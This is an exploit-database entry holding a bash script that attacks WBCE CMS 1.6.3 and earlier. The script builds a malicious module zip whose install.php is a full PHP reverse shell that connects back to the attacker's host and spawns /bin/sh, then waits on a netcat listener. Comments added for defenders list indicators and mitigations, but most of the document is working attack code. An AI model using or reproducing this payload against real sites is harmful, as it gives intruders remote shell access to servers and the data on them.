
7 changes to exploits/shellcodes/ghdb DataEase 2.4.0 - Database Configuration Information Exposure Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Watcharr 1.43.0 - Remote Code Execution (RCE) WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE) Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash

# Make a zip file exploit
# Start netcat listener
#
# Overview: this script builds a WBCE CMS module archive (shellModule.zip)
# holding two files, info.php (module metadata) and install.php (a PHP
# reverse shell), and then waits on a local netcat listener. Nothing is sent
# to the target by the script itself: per its own usage text, an operator who
# already holds admin credentials must upload and install the archive, and
# that install step is what runs install.php.
#
# Reviewer notes for defenders:
#   - Precondition is an authenticated admin session; the weakness being
#     abused is that installing a module executes PHP shipped in the archive.
#   - Artifacts written by this script: a module with directory 'modshell',
#     name 'Reverse Shell', version '1.3.3.7'. These strings are trivially
#     changed, so treat them as weak indicators only.
#   - Behaviour worth detecting on the web host: the PHP process opening an
#     outbound TCP connection (fsockopen) and spawning /bin/sh through
#     proc_open, with 'uname -a; w; id' as the first commands run.
#   - Mitigations that follow from the calls used below: limit who may
#     install modules, filter egress from the web server, and where feasible
#     disable proc_open/fsockopen through PHP's disable_functions setting.

# Require exactly two arguments (listener host and port); otherwise print a
# description plus usage and exit with status 1.
if [[ $# -ne 2 ]]; then
echo "[*] Description:"
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
echo "[*] It will create an infected module .zip file and start a netcat listener."
echo "[*] Once the zip is created, you will have to login to the admin page"
echo "[*] to upload and install the module, which will immediately run the shell"
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
echo "[!] Usage:"
echo "[*] $0 <lhost> <lport>"
exit 1
fi

# Abort when `which` prints no path for nc, i.e. netcat is not on PATH.
if [ -z "$(which nc)" ]; then
echo "[!] Netcat is not installed."
exit 1
fi

# Listener host and port. Both values are later expanded, unvalidated, into
# the generated install.php.
ip=$1
port=$2

# Start from a clean slate: delete any earlier archive and staging directory
# in the current working directory, then recreate the staging directory.
rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

# NOTE(review): [*] is unquoted in this and the later status messages, so the
# shell treats it as a glob pattern before echo sees it. The effect is
# cosmetic only.
echo [*] Crafting Payload

# Write the module descriptor. The heredoc delimiter is unquoted, so the shell
# processes the body: each "\$" becomes a literal "$" in the PHP file. The
# file only assigns the $module_* metadata variables shown below.
cat <<EOF > shellModule/info.php
<?php
/**
*
* @category modules
* @package Reverse Shell
* @author Swammers8
* @link https://swammers8.github.io/
* @license http://www.gnu.org/licenses/gpl.html
* @platform example.com
* @requirements PHP 5.6 and higher
* @version 1.3.3.7
* @lastmodified May 22 2025
*
*
*/

\$module_directory = 'modshell';
\$module_name = 'Reverse Shell';
\$module_function = 'page';
\$module_version = '1.3.3.7';
\$module_platform = '2.10.x';

\$module_author = 'Swammers8';
\$module_license = 'GNU General Public License';
\$module_description = 'This module is a backdoor';

?>
EOF

# Write the install hook. Same unquoted heredoc: "\$name" stays a PHP
# variable, while the bare $ip and $port on the two "CHANGE THIS" lines are
# replaced by the script's arguments at generation time.
#
# What the generated PHP does, in order:
#   1. If pcntl_fork exists: fork, let the parent exit, call posix_setsid()
#      in the child and set $daemon; otherwise print a warning and continue.
#   2. chdir("/") and umask(0).
#   3. fsockopen() to the configured host and port with a 30 second timeout.
#   4. proc_open() the $shell command line with pipes for stdin/stdout/stderr.
#   5. Switch all four streams to non-blocking and relay data between the
#      socket and the pipes with stream_select(), 1400 bytes per read, until
#      the socket or the child's stdout reaches EOF.
#   6. Close the streams and the process handle.
# The usage text above credits pentestmonkey's php-reverse-shell as the origin.
cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip'; // CHANGE THIS
\$port = $port; // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
\$pid = pcntl_fork();
if (\$pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if (\$pid) {
exit(0); // Parent exits
}

if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

\$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");

umask(0);


\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
printit("\$errstr (\$errno)");
exit(1);
}

\$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
if (feof(\$sock)) {
printit("ERROR: Shell connection terminated");
break;
}

if (feof(\$pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

if (in_array(\$sock, \$read_a)) {
if (\$debug) printit("SOCK READ");
\$input = fread(\$sock, \$chunk_size);
if (\$debug) printit("SOCK: \$input");
fwrite(\$pipes[0], \$input);
}

if (in_array(\$pipes[1], \$read_a)) {
if (\$debug) printit("STDOUT READ");
\$input = fread(\$pipes[1], \$chunk_size);
if (\$debug) printit("STDOUT: \$input");
fwrite(\$sock, \$input);
}

if (in_array(\$pipes[2], \$read_a)) {
if (\$debug) printit("STDERR READ");
\$input = fread(\$pipes[2], \$chunk_size);
if (\$debug) printit("STDERR: \$input");
fwrite(\$sock, \$input);
}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
if (!\$daemon) {
print "\$string\n";
}
}

?>
EOF

# Package the staging directory into shellModule.zip, then delete the staging
# directory so only the archive is left on disk.
echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

# Blocks here until the listener exits. Flags: -l listen, -v verbose,
# -n numeric addresses only (no DNS), -p local port.
nc -lvnp $port

# The closing message is also a forensic hint: the installed module stays
# registered on the CMS until someone removes it, so an unexpected
# 'Reverse Shell' entry on the module page is evidence of this script's use.
echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"